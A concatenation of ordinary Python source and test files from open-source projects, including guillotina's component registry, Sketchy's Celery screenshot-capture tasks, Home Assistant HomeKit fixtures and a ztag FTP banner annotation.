fixed_states: List[Any] # Constant states
def __len__(self) -> int:
"""Returns the number of states"""
return len(self.linear_states) + len(self.angular_states) + len(self.fixed_states)
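# Editor-added usage sketch (not part of the original nuplan module): shows how
# the dataclass above can be constructed and measured. The field values are
# hypothetical placeholders, not real nuplan planner states.
if __name__ == "__main__":
    example = SplitState(
        linear_states=[0.0, 1.5],    # variable states, e.g. x/y position
        angular_states=[3.14159],    # variable angle states with 2*pi period
        fixed_states=["vehicle_0"],  # constant states carried along unchanged
    )
    assert len(example) == 4  # 2 linear + 1 angular + 1 fixed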
|
guillotina/component/globalregistry.py | vinissimus/guillotina | 173 | 11096257 | ##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from guillotina.component._compat import _BLANK
from guillotina.component.interfaces import IComponentLookup
from guillotina.profile import profilable
from typing import Type
from zope.interface import implementer
from zope.interface import providedBy
from zope.interface.adapter import AdapterLookup
from zope.interface.adapter import AdapterRegistry
from zope.interface.registry import Components
import asyncio
import logging
import os
import time
profile_logger = logging.getLogger("guillotina.profile")
class GuillotinaAdapterLookup(AdapterLookup):
@profilable
async def asubscribers(self, objects, provided):
subscriptions = self.subscriptions(map(providedBy, objects), provided)
results = []
for subscription in sorted(subscriptions, key=lambda sub: getattr(sub, "priority", 100)):
if asyncio.iscoroutinefunction(subscription):
results.append(await subscription(*objects))
else:
results.append(subscription(*objects))
return results
@profilable
def subscribers(self, objects, provided):
subscriptions = self.subscriptions(map(providedBy, objects), provided)
result = []
for subscription in sorted(subscriptions, key=lambda sub: getattr(sub, "priority", 100)):
if not asyncio.iscoroutinefunction(subscription):
result.append(subscription(*objects))
return result
class DebugGuillotinaAdapterLookup(GuillotinaAdapterLookup): # pragma: no cover
@profilable
async def asubscribers(self, objects, provided):
from guillotina.utils import get_current_request, get_authenticated_user_id, get_dotted_name
from guillotina.exceptions import RequestNotFound
from guillotina import task_vars
if len(objects) > 1:
event = get_dotted_name(objects[1])
context = getattr(objects[0], "__uuid__", None)
else:
event = get_dotted_name(objects[0])
context = None
try:
request = get_current_request()
except RequestNotFound:
request = None
try:
url = request.url.human_repr()
except AttributeError:
# older version of aiohttp
url = ""
info = {
"url": url,
"container": getattr(task_vars.container.get(), "id", None),
"user": get_authenticated_user_id(),
"db_id": getattr(task_vars.db.get(), "id", None),
"request_uid": getattr(request, "_uid", None),
"method": getattr(request, "method", None),
"subscribers": [],
"context": context,
"event": event,
}
start = time.time() * 1000
subscriptions = sorted(
self.subscriptions(map(providedBy, objects), provided),
key=lambda sub: getattr(sub, "priority", 100),
)
info["lookup_time"] = (time.time() * 1000) - start
info["found"] = len(subscriptions)
results = []
for subscription in subscriptions:
start = time.time() * 1000
if asyncio.iscoroutinefunction(subscription):
results.append(await subscription(*objects))
else:
results.append(subscription(*objects))
info["subscribers"].append(
{"duration": (time.time() * 1000) - start, "name": get_dotted_name(subscription)}
)
info["duration"] = (time.time() * 1000) - start
profile_logger.info(info)
return results
class GuillotinaAdapterRegistry(AdapterRegistry):
"""
Customized adapter registry for async
"""
LookupClass: Type[GuillotinaAdapterLookup]
_delegated = AdapterRegistry._delegated + ("asubscribers",) # type: ignore
if os.environ.get("GDEBUG_SUBSCRIBERS", "").lower() in ("1", "true", "t"):
LookupClass = DebugGuillotinaAdapterLookup
else:
LookupClass = GuillotinaAdapterLookup
def __init__(self, parent, name):
self.__parent__ = parent
self.__name__ = name
super().__init__()
@implementer(IComponentLookup)
class GlobalComponents(Components): # type: ignore
def _init_registries(self):
self.adapters = GuillotinaAdapterRegistry(self, "adapters")
self.utilities = GuillotinaAdapterRegistry(self, "utilities")
def __reduce__(self):
# Global site managers are pickled as global objects
return self.__name__
base = GlobalComponents("base")
def get_global_components():
return base
def reset():
global base
base = GlobalComponents("base")
def provide_utility(component, provides=None, name=_BLANK):
base.registerUtility(component, provides, name, event=False)
def provide_adapter(factory, adapts=None, provides=None, name=_BLANK):
base.registerAdapter(factory, adapts, provides, name, event=False)
def provide_subscription_adapter(factory, adapts=None, provides=None):
base.registerSubscriptionAdapter(factory, adapts, provides, event=False)
def provide_handler(factory, adapts=None):
base.registerHandler(factory, adapts, event=False)
|
tests/test_mask_utils_detectron2.py | mintar/mseg-api | 213 | 11096279 | #!/usr/bin/env python3
import cv2
import matplotlib.pyplot as plt
import numpy as np
from mseg.utils.mask_utils_detectron2 import Visualizer
def test_visualizer1() -> None:
"""
label map with four quadrants.
| Sky | Road |
----------------
| Person | Horse |
"""
H = 640
W = 480
img_rgb = np.ones((H, W, 3), dtype=np.uint8)
label_map = np.zeros((H, W), dtype=np.uint8)
label_map[: H // 2, : W // 2] = 0
label_map[: H // 2, W // 2 :] = 1
label_map[H // 2 :, : W // 2] = 2
label_map[H // 2 :, W // 2 :] = 3
id_to_class_name_map = {0: "sky", 1: "road", 2: "person", 3: "horse"}
vis_obj = Visualizer(img_rgb, None)
output_img = vis_obj.overlay_instances(label_map, id_to_class_name_map)
plt.imshow(output_img)
# plt.show()
plt.close("all")
def test_visualizer2() -> None:
"""
Create label map with two embedded circles. Each circle
represents class 1 (the "person" class).
"""
H = 640
W = 480
img_rgb = np.ones((H, W, 3), dtype=np.uint8)
label_map = np.zeros((H, W), dtype=np.uint8)
label_map[100, 300] = 1
label_map[100, 100] = 1
# only 2 pixels will have value 1
mask_diff = np.ones_like(label_map).astype(np.uint8) - label_map
# Calculates the distance to the closest zero pixel for each pixel of the source image.
distance_mask = cv2.distanceTransform(
mask_diff, distanceType=cv2.DIST_L2, maskSize=cv2.DIST_MASK_PRECISE
)
distance_mask = distance_mask.astype(np.float32)
label_map = (distance_mask <= 25).astype(np.uint8)
id_to_class_name_map = {0: "road", 1: "person"}
# plt.imshow(label_map)
# plt.show()
vis_obj = Visualizer(img_rgb, None)
output_img = vis_obj.overlay_instances(label_map, id_to_class_name_map)
plt.imshow(output_img)
# plt.show()
plt.close("all")
"""
TODO: add more tests, e.g. with concentric circles
"""
if __name__ == "__main__":
test_visualizer1()
# test_visualizer2()
|
sdk-extension/opentelemetry-sdk-extension-aws/tests/resource/test_ecs.py | willarmiros/opentelemetry-python-contrib | 208 | 11096289 | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from collections import OrderedDict
from unittest.mock import mock_open, patch
from opentelemetry.sdk.extension.aws.resource.ecs import AwsEcsResourceDetector
from opentelemetry.semconv.resource import (
CloudPlatformValues,
CloudProviderValues,
ResourceAttributes,
)
MockEcsResourceAttributes = {
ResourceAttributes.CLOUD_PROVIDER: CloudProviderValues.AWS.value,
ResourceAttributes.CLOUD_PLATFORM: CloudPlatformValues.AWS_ECS.value,
ResourceAttributes.CONTAINER_NAME: "mock-container-name",
ResourceAttributes.CONTAINER_ID: "a4d00c9dd675d67f866c786181419e1b44832d4696780152e61afd44a3e02856",
}
class AwsEcsResourceDetectorTest(unittest.TestCase):
@patch.dict(
"os.environ", {"ECS_CONTAINER_METADATA_URI": "mock-uri"}, clear=True,
)
@patch(
"socket.gethostname",
return_value=f"{MockEcsResourceAttributes[ResourceAttributes.CONTAINER_NAME]}",
)
@patch(
"builtins.open",
new_callable=mock_open,
read_data=f"""14:name=systemd:/docker/{MockEcsResourceAttributes[ResourceAttributes.CONTAINER_ID]}
13:rdma:/
12:pids:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
11:hugetlb:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
10:net_prio:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
9:perf_event:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
8:net_cls:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
7:freezer:/docker/
6:devices:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
5:memory:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
4:blkio:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
3:cpuacct:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
2:cpu:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
1:cpuset:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
""",
)
def test_simple_create(self, mock_open_function, mock_socket_gethostname):
actual = AwsEcsResourceDetector().detect()
self.assertDictEqual(
actual.attributes.copy(), OrderedDict(MockEcsResourceAttributes)
)
|
tests/components/homekit/conftest.py | MrDelik/core | 30,023 | 11096302 | """HomeKit session fixtures."""
from contextlib import suppress
import os
from unittest.mock import patch
from pyhap.accessory_driver import AccessoryDriver
import pytest
from homeassistant.components.device_tracker.legacy import YAML_DEVICES
from homeassistant.components.homekit.const import EVENT_HOMEKIT_CHANGED
from tests.common import async_capture_events, mock_device_registry, mock_registry
@pytest.fixture
def hk_driver(loop):
"""Return a custom AccessoryDriver instance for HomeKit accessory init."""
with patch("pyhap.accessory_driver.AsyncZeroconf"), patch(
"pyhap.accessory_driver.AccessoryEncoder"
), patch("pyhap.accessory_driver.HAPServer.async_stop"), patch(
"pyhap.accessory_driver.HAPServer.async_start"
), patch(
"pyhap.accessory_driver.AccessoryDriver.publish"
), patch(
"pyhap.accessory_driver.AccessoryDriver.persist"
):
yield AccessoryDriver(pincode=b"123-45-678", address="127.0.0.1", loop=loop)
@pytest.fixture
def mock_hap(loop, mock_zeroconf):
"""Return a custom AccessoryDriver instance for HomeKit accessory init."""
with patch("pyhap.accessory_driver.AsyncZeroconf"), patch(
"pyhap.accessory_driver.AccessoryEncoder"
), patch("pyhap.accessory_driver.HAPServer.async_stop"), patch(
"pyhap.accessory_driver.HAPServer.async_start"
), patch(
"pyhap.accessory_driver.AccessoryDriver.publish"
), patch(
"pyhap.accessory_driver.AccessoryDriver.async_start"
), patch(
"pyhap.accessory_driver.AccessoryDriver.async_stop"
), patch(
"pyhap.accessory_driver.AccessoryDriver.persist"
):
yield AccessoryDriver(pincode=b"123-45-678", address="127.0.0.1", loop=loop)
@pytest.fixture
def events(hass):
"""Yield caught homekit_changed events."""
return async_capture_events(hass, EVENT_HOMEKIT_CHANGED)
@pytest.fixture(name="device_reg")
def device_reg_fixture(hass):
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture(name="entity_reg")
def entity_reg_fixture(hass):
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def demo_cleanup(hass):
"""Clean up device tracker demo file."""
yield
with suppress(FileNotFoundError):
os.remove(hass.config.path(YAML_DEVICES))
|
tests/test_ast.py | odinsemvosem/SKompiler | 112 | 11096320 | #pylint: disable=wildcard-import,unused-wildcard-import,no-member
import numpy as np
from skompiler.ast import *
from skompiler.dsl import *
def test_dsl():
assert isinstance(ident('x'), Identifier)
assert isinstance(ident('x', 1), VectorIdentifier)
assert isinstance(const(1), NumberConstant)
assert isinstance(const([1]), VectorConstant)
assert isinstance(const([[1]]), MatrixConstant)
assert isinstance(const(np.array([1], dtype='int')[0]), NumberConstant)
assert isinstance(const(np.array(1)), NumberConstant)
mtx = const(np.array([[1, 2]]))
assert isinstance(mtx, MatrixConstant)
assert len(mtx) == 1
v = mtx[0]
assert isinstance(v, VectorConstant)
assert len(v) == 2
n = v[1]
assert isinstance(n, NumberConstant)
assert n.value == 2
ids = vector(map(ident, 'abc'))
assert isinstance(ids, MakeVector)
assert len(ids.elems) == 3
assert isinstance(ids.elems[0], Identifier)
def test_singleton():
assert Add() is Add()
assert func.Add is Add()
assert func.Mul is Mul()
|
sketchy/controllers/tasks.py | fakeNetflix/sketchy | 790 | 11096321 | # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import boto
import lxml.html as LH
import lxml.html.clean as clean
import os
import re
import json
import requests
from requests.exceptions import ConnectionError
from requests import post
from boto.s3.key import Key
from boto.s3.connection import OrdinaryCallingFormat
from subprocess32 import PIPE
from collections import defaultdict
from sketchy import db, app, celery
from sketchy.models.capture import Capture
from sketchy.models.static import Static
from sketchy.controllers.validators import grab_domain
import subprocess32
import socket
import netaddr
@celery.task(name='check_url', bind=True)
def check_url(self, capture_id=0, retries=0, model='capture'):
"""
Check if a URL exists without downloading the whole file.
We only check the URL header.
"""
# check for env variable for session cookies
cookies = {}
try:
cookies = dict(item.split("=") for item in os.getenv('phantomjs_cookies').split(" "))
except:
pass
capture_record = Capture.query.filter(Capture.id == capture_id).first()
capture_record.job_status = 'STARTED'
# Write the number of retries to the capture record
db.session.add(capture_record)
capture_record.retry = retries
db.session.commit()
# Only retrieve the headers of the request, and return response code
try:
response = ""
verify_ssl = app.config['SSL_HOST_VALIDATION']
response = requests.get(capture_record.url, verify=verify_ssl, allow_redirects=False, timeout=5, headers={"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0"}, cookies=cookies)
capture_record.url_response_code = response.status_code
if capture_record.status_only:
capture_record.job_status = 'COMPLETED'
capture_record.capture_status = '%s HTTP STATUS CODE' % (response.status_code)
if capture_record.callback:
finisher(capture_record)
else:
capture_record.capture_status = '%s HTTP STATUS CODE' % (response.status_code)
# If URL doesn't return a valid status code or times out, raise an exception
except Exception as err:
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.url_response_code = 0
check_url.retry(kwargs={'capture_id': capture_id, 'retries': capture_record.retry + 1, 'model': model}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES'])
# If the code was not a good code, record the status as a 404 and raise an exception
finally:
db.session.commit()
return str(response.status_code)
def do_capture(status_code, the_record, base_url, model='capture', phantomjs_timeout=app.config['PHANTOMJS_TIMEOUT']):
"""
    Create a screenshot and text scrape from a provided html file.
This depends on phantomjs and an associated javascript file to perform the captures.
In the event an error occurs, an exception is raised and handled by the celery task
or the controller that called this method.
"""
# Make sure the the_record
db.session.add(the_record)
# If the capture is for static content, use a different PhantomJS config file
if model == 'static':
capture_name = the_record.filename
service_args = [
app.config['PHANTOMJS'],
'--ssl-protocol=any',
'--ignore-ssl-errors=yes',
os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/assets/static.js',
app.config['LOCAL_STORAGE_FOLDER'],
capture_name]
content_to_parse = os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name)
else:
capture_name = grab_domain(the_record.url) + '_' + str(the_record.id)
service_args = [
app.config['PHANTOMJS'],
'--ssl-protocol=any',
'--ignore-ssl-errors=yes',
os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/assets/capture.js',
the_record.url,
os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name)]
content_to_parse = os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name + '.html')
# Using subprocess32 backport, call phantom and if process hangs kill it
pid = subprocess32.Popen(service_args, stdout=PIPE, stderr=PIPE)
try:
stdout, stderr = pid.communicate(timeout=phantomjs_timeout)
except subprocess32.TimeoutExpired:
pid.kill()
stdout, stderr = pid.communicate()
app.logger.error('PhantomJS Capture timeout at {} seconds'.format(phantomjs_timeout))
raise subprocess32.TimeoutExpired('phantomjs capture',phantomjs_timeout)
# If the subprocess has an error, raise an exception
if stderr or stdout:
raise Exception("{}{}".format(stdout, stderr))
# Strip tags and parse out all text
ignore_tags = ('script', 'noscript', 'style')
with open(content_to_parse, 'r') as content_file:
content = content_file.read()
cleaner = clean.Cleaner()
content = cleaner.clean_html(content)
doc = LH.fromstring(content)
output = ""
for elt in doc.iterdescendants():
if elt.tag in ignore_tags:
continue
text = elt.text or ''
tail = elt.tail or ''
wordz = " ".join((text, tail)).strip('\t')
if wordz and len(wordz) >= 2 and not re.match("^[ \t\n]*$", wordz):
output += wordz.encode('utf-8')
# Since the filename format is different for static captures, update the filename
# This will ensure the URLs are pointing to the correct resources
if model == 'static':
capture_name = capture_name.split('.')[0]
    # Write the parsed html text into our capture folder
parsed_text = open(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name + '.txt'), 'wb')
parsed_text.write(output)
# Update the sketch record with the local URLs for the sketch, scrape, and html captures
the_record.sketch_url = base_url + '/files/' + capture_name + '.png'
the_record.scrape_url = base_url + '/files/' + capture_name + '.txt'
the_record.html_url = base_url + '/files/' + capture_name + '.html'
# Create a dict that contains what files may need to be written to S3
files_to_write = defaultdict(list)
files_to_write['sketch'] = capture_name + '.png'
files_to_write['scrape'] = capture_name + '.txt'
files_to_write['html'] = capture_name + '.html'
# If we are not writing to S3, update the capture_status that we are completed.
if not app.config['USE_S3']:
the_record.job_status = "COMPLETED"
the_record.capture_status = "LOCAL_CAPTURES_CREATED"
else:
the_record.capture_status = "LOCAL_CAPTURES_CREATED"
db.session.commit()
return files_to_write
def s3_save(files_to_write, the_record):
"""
Write a sketch, scrape, and html file to S3
"""
db.session.add(the_record)
# These are the content-types for the files S3 will be serving up
response_types = {'sketch': 'image/png', 'scrape': 'text/plain', 'html': 'text/html'}
# Iterate through each file we need to write to s3
for capture_type, file_name in files_to_write.items():
# Connect to S3, generate Key, set path based on capture_type, write file to S3
conn = boto.s3.connect_to_region(
region_name = app.config.get('S3_BUCKET_REGION_NAME'),
calling_format = boto.s3.connection.OrdinaryCallingFormat()
)
key = Key(conn.get_bucket(app.config.get('S3_BUCKET_PREFIX')))
path = "sketchy/{}/{}".format(capture_type, file_name)
key.key = path
key.set_contents_from_filename(app.config['LOCAL_STORAGE_FOLDER'] + '/' + file_name)
# Generate a URL for downloading the files
url = conn.generate_url(
app.config.get('S3_LINK_EXPIRATION'),
'GET',
bucket=app.config.get('S3_BUCKET_PREFIX'),
key=key.key,
response_headers={
'response-content-type': response_types[capture_type],
'response-content-disposition': 'attachment; filename=' + file_name
})
# Generate appropriate url based on capture_type
if capture_type == 'sketch':
the_record.sketch_url = str(url)
if capture_type == 'scrape':
the_record.scrape_url = str(url)
if capture_type == 'html':
the_record.html_url = str(url)
# Remove local files if we are saving to S3
os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['sketch']))
os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['scrape']))
os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['html']))
    # If there is no callback, the task is complete once the S3 items are saved
if the_record.callback:
the_record.capture_status = 'S3_ITEMS_SAVED'
else:
the_record.capture_status = 'S3_ITEMS_SAVED'
the_record.job_status = 'COMPLETED'
db.session.commit()
def finisher(the_record):
"""
    POST the finished capture record to the provided callback URL.
"""
db.session.add(the_record)
verify_ssl = app.config['SSL_HOST_VALIDATION']
# Set the correct headers for the postback
headers = {'Content-type': 'application/json', 'Accept': 'text/plain', 'Connection': 'close'}
#proxy = {"http": "127.0.0.1:8080"}
try:
# Blacklist IP addresses
ip_addr = socket.gethostbyname(grab_domain(the_record.url))
if app.config['IP_BLACKLISTING']:
if netaddr.all_matching_cidrs(ip_addr, app.config['IP_BLACKLISTING_RANGE'].split(',')):
the_record.capture_status = "IP BLACKLISTED:{} - ".format(ip_addr) + the_record.capture_status
except:
pass
req = post(the_record.callback, verify=verify_ssl, data=json.dumps(the_record.as_dict()), headers=headers)
# If a 4xx or 5xx status is received, raise an exception
req.raise_for_status()
# Update capture_record and save to database
the_record.job_status = 'COMPLETED'
# Removed to propagate blacklist message
#the_record.capture_status = 'CALLBACK_SUCCEEDED'
db.session.add(the_record)
db.session.commit()
@celery.task(name='celery_static_capture', ignore_result=True, bind=True)
def celery_static_capture(self, base_url, capture_id=0, retries=0, model="static"):
"""
Celery task used to create a sketch and scrape with a provided static HTML file.
Task also writes files to S3 or posts a callback depending on configuration file.
"""
static_record = Static.query.filter(Static.id == capture_id).first()
# Write the number of retries to the capture record
db.session.add(static_record)
static_record.retry = retries
db.session.commit()
# First perform the captures, then either write to S3, perform a callback, or neither
try:
# call the main capture function to retrieve sketches and scrapes
files_to_write = do_capture(0, static_record, base_url, model='static')
# Call the s3 save function if s3 is configured, and perform callback if configured.
if app.config['USE_S3']:
if static_record.callback:
s3_save(files_to_write, static_record)
finisher(static_record)
else:
s3_save(files_to_write, static_record)
elif static_record.callback:
finisher(static_record)
# Only execute retries on ConnectionError exceptions, otherwise fail immediately
except ConnectionError as err:
app.logger.error(err)
static_record.job_status = 'RETRY'
static_record.capture_status = str(err)
static_record.retry = retries + 1
db.session.commit()
raise celery_static_capture.retry(args=[base_url],
kwargs={'capture_id' :capture_id, 'retries': static_record.retry + 1, 'model': 'static'}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
# Catch exceptions raised by any functions called
except Exception as err:
app.logger.error(err)
static_record.job_status = 'FAILURE'
if str(err):
static_record.capture_status = str(err)
raise Exception
finally:
db.session.commit()
@celery.task(name='celery_capture', ignore_result=True, bind=True)
def celery_capture(self, status_code, base_url, capture_id=0, retries=0, model="capture", phantomjs_timeout=app.config['PHANTOMJS_TIMEOUT']):
"""
Celery task used to create sketch, scrape, html.
Task also writes files to S3 or posts a callback depending on configuration file.
"""
capture_record = Capture.query.filter(Capture.id == capture_id).first()
# Write the number of retries to the capture record
db.session.add(capture_record)
capture_record.retry = retries
db.session.commit()
try:
# Perform a callback or complete the task depending on error code and config
if capture_record.url_response_code > 400 and app.config['CAPTURE_ERRORS'] == False:
if capture_record.callback:
finisher(capture_record)
else:
capture_record.job_status = 'COMPLETED'
return True
# Only execute retries on ConnectionError exceptions, otherwise fail immediately
except ConnectionError as err:
app.logger.error(err)
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.retry = retries + 1
raise celery_capture.retry(args=[status_code, base_url],
kwargs = { 'capture_id' :capture_id, 'retries': capture_record.retry + 1, 'model': 'capture'}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
except Exception as err:
app.logger.error(err)
capture_record.job_status = 'FAILURE'
if str(err):
capture_record.capture_status = str(err)
capture_record.capture_status = str(err)
finally:
db.session.commit()
# First perform the captures, then either write to S3, perform a callback, or neither
try:
# call the main capture function to retrieve sketches, scrapes, and html
files_to_write = do_capture(status_code, capture_record, base_url, model='capture', phantomjs_timeout=phantomjs_timeout)
# Call the s3 save function if s3 is configured, and perform callback if configured.
if app.config['USE_S3']:
if capture_record.callback:
s3_save(files_to_write, capture_record)
finisher(capture_record)
else:
s3_save(files_to_write, capture_record)
elif capture_record.callback:
finisher(capture_record)
# If the screenshot generation timed out, try to render again
except subprocess32.TimeoutExpired as err:
app.logger.error(err)
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.retry = retries + 1
raise celery_capture.retry(args=[status_code, base_url],
kwargs={'capture_id' :capture_id, 'retries': capture_record.retry, 'model': 'capture', 'phantomjs_timeout': (capture_record.retry * 5) + phantomjs_timeout}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
# Retry on connection error exceptions
except ConnectionError as err:
app.logger.error(err)
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.retry = retries + 1
raise celery_capture.retry(args=[status_code, base_url],
kwargs={'capture_id' :capture_id, 'retries': capture_record.retry, 'model': 'capture'}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
# For all other exceptions, fail immediately
except Exception as err:
app.logger.error(err)
if str(err):
capture_record.capture_status = str(err)
capture_record.job_status = 'FAILURE'
raise Exception
finally:
db.session.commit()
|
utils/gyb_benchmark_support.py | francisvm/swift | 427 | 11096330 |
# ===--- gyb_benchmark_support.py --------------------*- coding: utf-8 -*-===//
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
import os
import re
script_dir = os.path.dirname(os.path.realpath(__file__))
perf_dir = os.path.realpath(os.path.join(script_dir, '../benchmark'))
single_source_dir = os.path.join(perf_dir, 'single-source')
multi_source_dir = os.path.join(perf_dir, 'multi-source')
def all_files(directory, extension): # matching: [directory]/**/*[extension]
return [
os.path.join(root, f)
for root, _, files in os.walk(directory)
for f in files if f.endswith(extension)
]
# CMakeList single-source
test_files = all_files(single_source_dir, '.swift')
tests = sorted(os.path.basename(x).split('.')[0] for x in test_files)
# CMakeList multi-source
class MultiSourceBench(object):
def __init__(self, path):
self.name = os.path.basename(path)
self.files = [x for x in os.listdir(path)
if x.endswith('.swift')]
multisource_benches = [
MultiSourceBench(os.path.join(multi_source_dir, x))
for x in os.listdir(multi_source_dir)
if os.path.isdir(os.path.join(multi_source_dir, x))
] if os.path.isdir(multi_source_dir) else []
def get_run_funcs(filepath):
content = open(filepath).read()
return re.findall(r'func run_(.*?)\(', content)
def find_run_funcs():
swift_files = all_files(single_source_dir, '.swift')
swift_files += all_files(multi_source_dir, '.swift')
return sorted([func for f in swift_files for func in get_run_funcs(f)])
all_run_funcs = find_run_funcs()
|
src/zeep/wsse/__init__.py | vascohenriques/python-zeep | 1,763 | 11096353 |
from .compose import Compose # noqa
from .signature import BinarySignature, MemorySignature, Signature # noqa
from .username import UsernameToken # noqa
|
tableschema/types/duration.py | vincentchevrier/tableschema-py | 224 | 11096374 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import six
import datetime
import isodate
from ..config import ERROR
# Module API
def cast_duration(format, value, **options):
if not isinstance(value, (isodate.Duration, datetime.timedelta)):
if not isinstance(value, six.string_types):
return ERROR
try:
value = isodate.parse_duration(value)
except Exception:
return ERROR
return value
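# Illustrative examples (editor addition, not part of upstream tableschema).
# ``cast_duration`` passes through isodate.Duration/timedelta values, parses
# ISO 8601 duration strings, and returns the ERROR sentinel for anything else:
#   cast_duration('default', 'P1Y2M3DT4H5M6S')        -> isodate.Duration(...)
#   cast_duration('default', datetime.timedelta(1))   -> datetime.timedelta(1)
#   cast_duration('default', 'not a duration')        -> ERROR
#   cast_duration('default', 123)                     -> ERROR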
|
src/vm_test.py | laubonghaudoi/Cantonese | 1,188 | 11096401 |
import register_vm as r_vm
import stack_vm as s_vm
def test_register_vm() -> None:
CantoneseState = r_vm.CanState("")
CantoneseState.push_boolean(True)
CantoneseState.dump()
CantoneseState.push_integer(10)
CantoneseState.dump()
CantoneseState.push_null()
CantoneseState.dump()
CantoneseState.push_string("Hello World")
CantoneseState.dump()
CantoneseState.push_value(-4)
CantoneseState.dump()
CantoneseState.replace(3)
CantoneseState.dump()
CantoneseState.set_top(6)
CantoneseState.dump()
CantoneseState.remove(-3)
CantoneseState.dump()
CantoneseState.set_top(-5)
CantoneseState.dump()
def test_stack_vm() -> None:
ins = [
s_vm.Instruction(1, "OP_LOAD_NAME", 0),
s_vm.Instruction(2, "OP_LOAD_CONST", 0),
s_vm.Instruction(3, "OP_CALL_FUNCTION", 1),
s_vm.Instruction(4, "OP_RETURN", 0)
]
code = s_vm.Code()
code.ins_lst = ins
code.co_consts = {0 : ['string', ' " Hello World " ']}
code.co_names = {0 : 'print'}
cs = s_vm.CanState(code)
cs._run()
if __name__ == '__main__':
print("test register vm:")
test_register_vm()
print("test stack vm:")
test_stack_vm() |
ztag/annotations/FtpSoftAtHome.py | justinbastress/ztag | 107 | 11096424 |
import re
from ztag.annotation import Manufacturer
from ztag.annotation import Annotation
from ztag.annotation import Type
from ztag.annotation import OperatingSystem
from ztag import protocols
import ztag.test
class FtpSoftAtHome(Annotation):
protocol = protocols.FTP
subprotocol = protocols.FTP.BANNER
port = None
manufact_re = re.compile(
"^220---------- Welcome to SoftAtHome FTP Server",
re.IGNORECASE
)
tests = {
"FtpSoftAtHome_1": {
"global_metadata": {
"manufacturer": Manufacturer.SOFT_AT_HOME,
},
"local_metadata": {
"product": "SoftAtHome Framework"
}
}
}
def process(self, obj, meta):
banner = obj["banner"]
if self.manufact_re.search(banner):
meta.global_metadata.manufacturer = Manufacturer.SOFT_AT_HOME
meta.local_metadata.product = "SoftAtHome Framework"
return meta
""" Tests
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:31. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
